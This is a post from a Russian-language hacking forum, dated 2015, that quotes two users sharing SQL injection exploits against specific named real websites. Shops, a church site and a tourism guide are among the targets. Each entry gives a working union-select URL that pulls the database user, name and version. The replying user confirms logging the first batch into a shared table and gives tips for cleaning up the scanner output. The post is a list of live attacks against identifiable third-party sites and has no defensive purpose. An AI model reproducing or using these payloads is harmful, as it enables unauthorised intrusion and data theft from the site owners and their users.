Показать сообщение отдельно

  #14  
Старый 07.06.2015, 20:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Rypjaer  

Сайт:
www.justintime.in
Уязвимость: SQLi
Эксплоит:
Код:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+
Сайт:
www.hergolfgame.com
Уязвимость: SQLi
Эксплоит:
Код:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+
Сайт:
www.secretslk.com
Уязвимость: SQLi
Эксплоит:
Код:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
Код:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
Сайт:
www.localfirstaz.com
Уязвимость: SQLi
Эксплоит:
Код:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
добавил в таблицу.

Цитата:
Сообщение от Печа  

Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18
Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.judgement-yard.com/index.php?pageID=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15&detail=log&id=75
Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://newchristian.com/view.php?id=999999.9 union all select 1,2,[t]
Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://patagonianshells.com/index.php?link=home&seccion=999999.9 union all select 1,2,3,4,[t],6--
Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9" union all select [t],2 and "0"="0&lang=english
Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.seavernon.com/index.php?id=22&lg=fr or 1=[t] and 1=1
Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
Код:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=[t]
на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод
 
Ответить с цитированием